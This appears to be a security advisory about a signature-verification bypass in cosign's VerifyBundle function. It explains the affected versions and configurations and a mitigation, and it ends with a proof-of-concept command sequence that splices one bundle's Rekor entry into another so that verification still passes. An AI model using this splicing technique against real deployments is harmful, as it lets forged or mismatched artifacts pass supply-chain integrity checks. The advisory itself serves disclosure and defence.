Improper Verification of Cryptographic Signature Affecting github.com/sigstore/cosign/pkg/cosign package, versions >=2.0.0 <2.6.2>=3.0.0 <3.0.4

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature via the VerifyBundle function in the verify.go file. An attacker can bypass artifact integrity checks by crafting a bundle that includes any arbitrary Rekor entry, allowing successful verification of artifacts that are not actually associated with the referenced digest, signature, or public key.

Note: This vulnerability affects only users who either provide a trusted root via --trusted-root or rely on one that is automatically fetched from a TUF repository, in cases where no trusted key material is supplied via SIGSTORE_REKOR_PUBLIC_KEY.

By manually enforcing trusted key material for the Rekor Transparency Log, you can mitigate bypass risks by ensuring the tool doesn’t depend solely on potentially mismatched or unverified bundle data.

echo blob > /tmp/blob
cosign sign-blob -y --new-bundle-format=false --bundle /tmp/bundle.1 --use-signing-config=false /tmp/blob
cosign sign-blob -y --new-bundle-format=false --bundle /tmp/bundle.2 --use-signing-config=false /tmp/blob
jq ".rekorBundle |= $(jq .rekorBundle /tmp/bundle.2)" /tmp/bundle.1 > /tmp/bundle.3
cosign verify-blob --bundle /tmp/bundle.3 --certificate-identity-regexp='.*' --certificate-oidc-issuer-regexp='.*' /tmp/blob

• GitHub Commit
• GitHub Commit
• GitHub PR